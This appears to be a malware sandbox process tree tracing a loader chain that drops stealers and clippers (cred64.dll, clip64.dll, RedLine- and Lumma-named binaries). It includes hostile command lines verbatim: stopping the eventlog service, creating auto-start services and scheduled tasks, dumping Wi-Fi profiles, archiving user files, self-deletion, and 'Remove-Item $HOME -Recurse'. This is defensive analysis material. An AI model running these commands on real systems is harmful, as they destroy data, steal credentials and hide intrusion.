- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:4040 -
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4516 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000030041\do.ps1"4⤵PID:5532
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5432 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa71759758,0x7ffa71759768,0x7ffa717597786⤵PID:5680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1832 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:86⤵PID:6064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:86⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1600 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:26⤵PID:4340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:16⤵PID:6740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:16⤵PID:6836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1068 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:16⤵PID:7764
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4736 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:86⤵PID:6668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=5068 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:16⤵PID:5640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:86⤵PID:6056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5504 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:86⤵PID:6296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5488 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:86⤵PID:7340
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6116 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:86⤵PID:7336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 --field-trial-handle=2160,i,15687522871209368187,14613680082153679502,131072 /prefetch:86⤵PID:8100
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com5⤵PID:2096
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com6⤵
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5232 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5232.0.1529740076\724347768" -parentBuildID 20221007134813 -prefsHandle 1636 -prefMapHandle 1628 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a4b9f111-a507-431e-86bc-6124e068ac71} 5232 "\\.\pipe\gecko-crash-server-pipe.5232" 1728 1c0181d9558 gpu7⤵PID:6516
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5232.1.1057563302\995473958" -parentBuildID 20221007134813 -prefsHandle 2172 -prefMapHandle 2168 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f197fc6-c1c9-4987-878d-517264c76da3} 5232 "\\.\pipe\gecko-crash-server-pipe.5232" 2200 1c017939a58 socket7⤵PID:6028
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5232.2.1601956699\219778415" -childID 1 -isForBrowser -prefsHandle 3260 -prefMapHandle 3256 -prefsLen 21976 -prefMapSize 233444 -jsInitHandle 916 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ce49b926-66b0-4ecf-90c7-3cb3b504f868} 5232 "\\.\pipe\gecko-crash-server-pipe.5232" 3320 1c01c3ee958 tab7⤵PID:7264
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.linkedin.com/login5⤵PID:8060
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa71759758,0x7ffa71759768,0x7ffa717597786⤵PID:8092
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login5⤵PID:7860
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.linkedin.com/login6⤵PID:8052
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login5⤵
- Enumerates system info in registry
PID:6000 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffa71759758,0x7ffa71759768,0x7ffa717597786⤵PID:7940
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com5⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1436 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa752f9758,0x7ffa752f9768,0x7ffa752f97786⤵PID:1216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 --field-trial-handle=1832,i,849681488697078616,5437227592256930,131072 /prefetch:86⤵PID:7828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 --field-trial-handle=1832,i,849681488697078616,5437227592256930,131072 /prefetch:86⤵PID:5792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1656 --field-trial-handle=1832,i,849681488697078616,5437227592256930,131072 /prefetch:26⤵PID:5308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2632 --field-trial-handle=1832,i,849681488697078616,5437227592256930,131072 /prefetch:16⤵
- Drops file in Program Files directory
PID:9124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2624 --field-trial-handle=1832,i,849681488697078616,5437227592256930,131072 /prefetch:16⤵PID:9152
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com5⤵PID:6512
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com6⤵PID:488
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000031001\fu.exe"C:\Users\Admin\AppData\Local\Temp\1000031001\fu.exe"4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4308
-
-
C:\Users\Admin\AppData\Local\Temp\1000395001\ladas.exe"C:\Users\Admin\AppData\Local\Temp\1000395001\ladas.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1368
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main4⤵
- Loads dropped DLL
PID:3888 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main5⤵PID:5984
-
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵PID:5316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\063448957137_Desktop.zip' -CompressionLevel Optimal6⤵PID:6744
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000396001\dota.exe"C:\Users\Admin\AppData\Local\Temp\1000396001\dota.exe"4⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4900
-
-
C:\Users\Admin\AppData\Local\Temp\1000398001\InstallSetup3.exe"C:\Users\Admin\AppData\Local\Temp\1000398001\InstallSetup3.exe"4⤵PID:5968
-
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exeC:\Users\Admin\AppData\Local\Temp\BroomSetup.exe5⤵
- Suspicious use of SetWindowsHookEx
PID:3000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "6⤵PID:2992
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵PID:3956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F7⤵
- Creates scheduled task(s)
PID:6428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsv4DA1.tmpC:\Users\Admin\AppData\Local\Temp\nsv4DA1.tmp5⤵PID:6372
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main4⤵
- Blocklisted process makes network request
- Loads dropped DLL
PID:5140
-
-
C:\Users\Admin\AppData\Local\Temp\1000399001\for.exe"C:\Users\Admin\AppData\Local\Temp\1000399001\for.exe"4⤵
- Suspicious use of SetThreadContext
PID:5448 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:6936
-
C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"C:\Users\Admin\AppData\Roaming\configurationValue\STAR.exe"6⤵PID:7624
-
-
C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe"C:\Users\Admin\AppData\Roaming\configurationValue\bott.exe"6⤵PID:7548
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"6⤵PID:9904
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 37⤵PID:10968
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000400001\lolololoMRK123.exe"C:\Users\Admin\AppData\Local\Temp\1000400001\lolololoMRK123.exe"4⤵
- Suspicious use of SetThreadContext
PID:616 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:7128
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000401001\National.exe"C:\Users\Admin\AppData\Local\Temp\1000401001\National.exe"4⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:6896 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe5⤵PID:6432
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe5⤵PID:5684
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000402001\987123.exe"C:\Users\Admin\AppData\Local\Temp\1000402001\987123.exe"4⤵
- Checks SCSI registry key(s)
PID:2492
-
-
C:\Users\Admin\AppData\Local\Temp\1000404001\dayroc.exe"C:\Users\Admin\AppData\Local\Temp\1000404001\dayroc.exe"4⤵PID:6344
-
-
C:\Users\Admin\AppData\Local\Temp\1000405001\goldprime12241421421.exe"C:\Users\Admin\AppData\Local\Temp\1000405001\goldprime12241421421.exe"4⤵
- Suspicious use of SetThreadContext
PID:828 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:7388
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:7512
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000406001\phonesteal.exe"C:\Users\Admin\AppData\Local\Temp\1000406001\phonesteal.exe"4⤵PID:7028
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "THYAWYFT"5⤵
- Launches sc.exe
PID:7088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "THYAWYFT" binpath= "C:\ProgramData\mkiurbjjkopl\vzxmpncsktsu.exe" start= "auto"5⤵
- Launches sc.exe
PID:3388
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "THYAWYFT"5⤵
- Launches sc.exe
PID:6484
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:6556
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000407001\daisy123.exe"C:\Users\Admin\AppData\Local\Temp\1000407001\daisy123.exe"4⤵PID:5660
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:7456
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000408001\lumma123142124.exe"C:\Users\Admin\AppData\Local\Temp\1000408001\lumma123142124.exe"4⤵
- Suspicious use of SetThreadContext
PID:224 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵PID:3604
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000409001\new.exe"C:\Users\Admin\AppData\Local\Temp\1000409001\new.exe"4⤵PID:404
-
-
C:\Users\Admin\AppData\Local\Temp\1000411001\Amadey.exe"C:\Users\Admin\AppData\Local\Temp\1000411001\Amadey.exe"4⤵
- Drops file in Windows directory
PID:2992
-
-
C:\Users\Admin\AppData\Local\Temp\1000412001\1800.exe"C:\Users\Admin\AppData\Local\Temp\1000412001\1800.exe"4⤵
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
PID:3408 -
C:\ProgramData\viewer\viewer.exe"C:\ProgramData\viewer\viewer.exe"5⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:7036 -
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:6880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000410001\redline1234min.exe"C:\Users\Admin\AppData\Local\Temp\1000410001\redline1234min.exe"4⤵
- Checks BIOS information in registry
PID:6240 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "FLWCUERA"5⤵
- Launches sc.exe
PID:7400
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "FLWCUERA" binpath= "C:\ProgramData\eyfisgalqlbk\iojmibhyhiws.exe" start= "auto"5⤵
- Launches sc.exe
PID:7908
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\1000410001\redline1234min.exe"5⤵PID:7304
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:7620
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "FLWCUERA"5⤵
- Launches sc.exe
PID:7264
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog5⤵
- Launches sc.exe
PID:7276
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\install.exe"C:\Users\Admin\AppData\Local\Temp\Files\install.exe"2⤵
- Executes dropped EXE
PID:2944 -
C:\Users\Admin\AppData\Local\Temp\Files\install.exe"C:\Users\Admin\AppData\Local\Temp\Files\install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
PID:5428 -
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\netconn_properties.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/netconn_properties.exe4⤵PID:6616
-
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\netconn_properties.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/netconn_properties.exe4⤵PID:7948
-
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\registers.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/registers.exe4⤵
- Loads dropped DLL
PID:8148
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t """4⤵PID:4324
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t ""5⤵PID:8944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\svchost.exe""4⤵PID:8828
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\svchost.exe"5⤵PID:8672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\svchost.exe""4⤵PID:8268
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\svchost.exe"5⤵PID:7716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\msiexec.exe""4⤵PID:6516
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\msiexec.exe"5⤵PID:8896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\msiexec.exe""4⤵PID:6696
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\msiexec.exe"5⤵PID:8708
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\smss.exe""4⤵PID:7480
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\smss.exe"5⤵PID:7032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\smss.exe""4⤵
- Suspicious use of SetThreadContext
PID:6816 -
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\smss.exe"5⤵PID:7832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\conhost.exe""4⤵PID:6368
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\conhost.exe"5⤵PID:10936
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\conhost.exe""4⤵PID:6560
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\conhost.exe"5⤵PID:9852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\svchost.exe""4⤵PID:10684
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\svchost.exe"5⤵PID:9916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\svchost.exe""4⤵PID:2388
-
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\svchost.exe"5⤵PID:7624
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\csrss.exe""4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6416 -
C:\Users\Admin\AppData\Local\Temp\_MEI29442\exe\upx.exeC:\Users\Admin\AppData\Local\Temp\_MEI29442\exe/upx.exe -t "C:\Windows\System32\csrss.exe"5⤵PID:10260
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe"C:\Users\Admin\AppData\Local\Temp\Files\osminogs.exe"2⤵
- Executes dropped EXE
PID:4288
-
-
C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe"C:\Users\Admin\AppData\Local\Temp\Files\notepad.exe"2⤵PID:1676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove-Item $HOME -Recurse3⤵PID:5920
-
-
-
